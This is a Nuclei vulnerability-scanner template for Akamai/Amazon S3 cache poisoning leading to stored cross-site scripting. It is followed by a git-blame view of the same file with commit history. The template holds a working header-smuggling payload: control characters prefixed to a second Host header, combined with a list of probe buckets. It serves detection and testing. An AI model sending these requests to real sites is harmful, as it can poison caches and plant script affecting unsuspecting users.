nuclei-templates/http/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml

id: akamai-s3-cache-poisoning

info:
  name: Akamai/Amazon S3 - Cache Poisoning
  author: DhiyaneshDk
  severity: high
  description: Akamai/Amazon S3 expose a stored cross-site scripting vulnerability generated by cache poisoning capability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can further allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://web.archive.org/web/20230101082612/https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/
    - https://owasp.org/www-community/attacks/Cache_Poisoning
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
    cvss-score: 7.1
    cwe-id: CWE-44
  metadata:
    verified: true
    max-request: 204
  tags: cache,poisoning,xss,akamai,s3,misconfig
variables:
  rand: "{{rand_base(5)}}"

http:
  - raw:
      - |+
        GET /nuclei.svg?{{rand}}=x HTTP/1.1
        Host: {{Hostname}}
        {{escape}}Host: {{bucket}}

      - |+
        GET /nuclei.svg?{{rand}}=x HTTP/1.1
        Host: {{Hostname}}

    attack: clusterbomb
    payloads:
      escape:
        - "\v"
        - "\f"
        - "\x1c"
        - "\x1d"
        - "\x1e"
        - "\x1f"
      bucket:
        - "nuclei-ap-northeast-1"
        - "nuclei-ap-northeast-2"
        - "nuclei-ap-northeast-3"
        - "nuclei-ap-south-1"
        - "nuclei-ap-southeast-1"
        - "nuclei-ap-southeast-2"
        - "nuclei-ca-central-1"
        - "nuclei-eu-central-1"
        - "nuclei-eu-north-1"
        - "nuclei-eu-west-1"
        - "nuclei-eu-west-2"
        - "nuclei-eu-west-3"
        - "nuclei-sa-east-1"
        - "nuclei-us-east-1"
        - "nuclei-us-east-2"
        - "nuclei-us-west-1"
        - "nuclei-us-west-2"
    stop-at-first-match: true
    unsafe: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "alert(document.domain)")'
          - 'status_code_2 == 200'
        condition: and

# digest: 490a0046304402205d755aa1fb1c07d6eac253f8ed760b27408545a8b3bd8104e6cb8298d05d720802204ffa53e1789ed44edb45fc98d3b03deaa7da5566a8bf3a3bce1b6ac03c1df145:922c64590222798bb761d5b6d8e72950
Create akamai-s3-cache-poisoning.yaml 🔥 (#6468) * Create akamai-s3-cache-poisoning.yaml * fix-lint * misc update Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-01-05 18:00:26 +00:00			`id: akamai-s3-cache-poisoning`

			`info:`
Enhancement: misconfiguration/akamai/akamai-s3-cache-poisoning.yaml by cs 2023-03-10 18:41:55 +00:00			`name: Akamai/Amazon S3 - Cache Poisoning`
Create akamai-s3-cache-poisoning.yaml 🔥 (#6468) * Create akamai-s3-cache-poisoning.yaml * fix-lint * misc update Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-01-05 18:00:26 +00:00			`author: DhiyaneshDk`
Dashboard Content Enhancements (#6965) * Add description and enhance one where the UI failed to save properly. dos2unix on a template * Change cvedetails link to nvd * make severities match * Enhancement: cves/2015/CVE-2015-2863.yaml by md * Enhancement: cves/2017/CVE-2017-14524.yaml by md * Enhancement: cves/2017/CVE-2017-5638.yaml by md * Enhancement: cves/2019/CVE-2019-16759.yaml by md * Enhancement: cves/2021/CVE-2021-22986.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24155.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24347.yaml by md * Enhancement: cves/2021/CVE-2021-25003.yaml by md * Enhancement: cves/2021/CVE-2021-25296.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-25296.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-25298.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-28151.yaml by md * Enhancement: cves/2021/CVE-2021-30128.yaml by md * Enhancement: cves/2022/CVE-2022-0824.yaml by md * Enhancement: cves/2022/CVE-2022-0824.yaml by md * Enhancement: cves/2022/CVE-2022-0885.yaml by md * Enhancement: cves/2022/CVE-2022-21587.yaml by md * Enhancement: cves/2022/CVE-2022-2314.yaml by md * Enhancement: cves/2022/CVE-2022-24816.yaml by md * Enhancement: cves/2022/CVE-2022-31499.yaml by md * Enhancement: cves/2022/CVE-2022-21587.yaml by md * Enhancement: cves/2021/CVE-2021-24155.yaml by md * Enhancement: cves/2017/CVE-2017-5638.yaml by md * Enhancement: cves/2015/CVE-2015-2863.yaml by md * Enhancement: cves/2022/CVE-2022-33901.yaml by md * Enhancement: cves/2022/CVE-2022-2314.yaml by md * Enhancement: cves/2022/CVE-2022-33901.yaml by md * Enhancement: cves/2022/CVE-2022-34753.yaml by md * Enhancement: cves/2022/CVE-2022-39952.yaml by md * Enhancement: cves/2022/CVE-2022-4060.yaml by md * Enhancement: cves/2022/CVE-2022-44877.yaml by md * Enhancement: cves/2023/CVE-2023-0669.yaml by md * Enhancement: cves/2023/CVE-2023-26255.yaml by md * Enhancement: cves/2023/CVE-2023-26256.yaml by md * Enhancement: exposures/files/salesforce-credentials.yaml by md * Enhancement: misconfiguration/hadoop-unauth-rce.yaml by md * Enhancement: misconfiguration/installer/nopcommerce-installer.yaml by md * Enhancement: network/backdoor/backdoored-zte.yaml by md * Enhancement: network/detection/ibm-d2b-database-server.yaml by md * Enhancement: network/detection/ibm-d2b-database-server.yaml by md * Enhancement: technologies/oracle/oracle-atg-commerce.yaml by md * Enhancement: token-spray/api-abuseipdb.yaml by md * Enhancement: token-spray/api-abuseipdb.yaml by md * Enhancement: token-spray/api-dbt.yaml by md * Enhancement: vulnerabilities/avaya/avaya-aura-rce.yaml by md * Enhancement: vulnerabilities/avaya/avaya-aura-xss.yaml by md * Enhancement: vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml by md * Enhancement: vulnerabilities/froxlor-xss.yaml by md * Enhancement: vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/opencpu/opencpu-rce.yaml by md * Enhancement: vulnerabilities/other/academy-lms-xss.yaml by md * Enhancement: vulnerabilities/other/caucho-resin-info-disclosure.yaml by md * Enhancement: vulnerabilities/other/ckan-dom-based-xss.yaml by md * Enhancement: vulnerabilities/other/couchdb-adminparty.yaml by md * Enhancement: vulnerabilities/other/graylog-log4j.yaml by md * Enhancement: vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml by md * Initial cleanups for syntax errors * dashboard gremlins * Add log4j back to name * Enhancement: exposures/files/salesforce-credentials.yaml by cs * Enhancement: misconfiguration/installer/nopcommerce-installer.yaml by cs * Enhancement: network/backdoor/backdoored-zte.yaml by cs * Enhancement: vulnerabilities/other/couchdb-adminparty.yaml by cs * Sev and other info tweaks * Merge conflict --------- Co-authored-by: sullo <sullo@cirt.net> 2023-03-27 17:46:47 +00:00			`severity: high`
Enhancement: misconfiguration/akamai/akamai-s3-cache-poisoning.yaml by cs 2023-03-10 18:41:55 +00:00			`description: Akamai/Amazon S3 expose a stored cross-site scripting vulnerability generated by cache poisoning capability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can further allow the attacker to steal cookie-based authentication credentials and launch other attacks.`
Create akamai-s3-cache-poisoning.yaml 🔥 (#6468) * Create akamai-s3-cache-poisoning.yaml * fix-lint * misc update Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-01-05 18:00:26 +00:00			`reference:`
Update akamai-s3-cache-poisoning.yaml URL no longer available, update using webarchive. 2023-01-19 22:07:50 +00:00			`- https://web.archive.org/web/20230101082612/https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/`
Create akamai-s3-cache-poisoning.yaml 🔥 (#6468) * Create akamai-s3-cache-poisoning.yaml * fix-lint * misc update Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-01-05 18:00:26 +00:00			`- https://owasp.org/www-community/attacks/Cache_Poisoning`
Enhancement: misconfiguration/akamai/akamai-s3-cache-poisoning.yaml by cs 2023-03-10 18:41:55 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L`
			`cvss-score: 7.1`
			`cwe-id: CWE-44`
Create akamai-s3-cache-poisoning.yaml 🔥 (#6468) * Create akamai-s3-cache-poisoning.yaml * fix-lint * misc update Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-01-05 18:00:26 +00:00			`metadata:`
boolean format update 2023-06-04 08:13:42 +00:00			`verified: true`
templateman update 2023-10-14 11:27:55 +00:00			`max-request: 204`
fix: templates with generic tag should not depend on specific tech 2023-08-18 16:23:19 +00:00			`tags: cache,poisoning,xss,akamai,s3,misconfig`
Create akamai-s3-cache-poisoning.yaml 🔥 (#6468) * Create akamai-s3-cache-poisoning.yaml * fix-lint * misc update Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-01-05 18:00:26 +00:00			`variables:`
			`rand: "{{rand_base(5)}}"`

Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create akamai-s3-cache-poisoning.yaml 🔥 (#6468) * Create akamai-s3-cache-poisoning.yaml * fix-lint * misc update Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-01-05 18:00:26 +00:00			`- raw:`
			`- \|+`
			`GET /nuclei.svg?{{rand}}=x HTTP/1.1`
			`Host: {{Hostname}}`
			`{{escape}}Host: {{bucket}}`

			`- \|+`
			`GET /nuclei.svg?{{rand}}=x HTTP/1.1`
			`Host: {{Hostname}}`

			`attack: clusterbomb`
			`payloads:`
			`escape:`
templateman update 2023-10-14 11:27:55 +00:00			`- "\v"`
			`- "\f"`
Create akamai-s3-cache-poisoning.yaml 🔥 (#6468) * Create akamai-s3-cache-poisoning.yaml * fix-lint * misc update Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-01-05 18:00:26 +00:00			`- "\x1c"`
			`- "\x1d"`
			`- "\x1e"`
			`- "\x1f"`
			`bucket:`
			`- "nuclei-ap-northeast-1"`
			`- "nuclei-ap-northeast-2"`
			`- "nuclei-ap-northeast-3"`
			`- "nuclei-ap-south-1"`
			`- "nuclei-ap-southeast-1"`
			`- "nuclei-ap-southeast-2"`
			`- "nuclei-ca-central-1"`
			`- "nuclei-eu-central-1"`
			`- "nuclei-eu-north-1"`
			`- "nuclei-eu-west-1"`
			`- "nuclei-eu-west-2"`
			`- "nuclei-eu-west-3"`
			`- "nuclei-sa-east-1"`
			`- "nuclei-us-east-1"`
			`- "nuclei-us-east-2"`
			`- "nuclei-us-west-1"`
			`- "nuclei-us-west-2"`
			`stop-at-first-match: true`
			`unsafe: true`
			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'contains(body_2, "alert(document.domain)")'`
			`- 'status_code_2 == 200'`
			`condition: and`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 490a0046304402205d755aa1fb1c07d6eac253f8ed760b27408545a8b3bd8104e6cb8298d05d720802204ffa53e1789ed44edb45fc98d3b03deaa7da5566a8bf3a3bce1b6ac03c1df145:922c64590222798bb761d5b6d8e72950`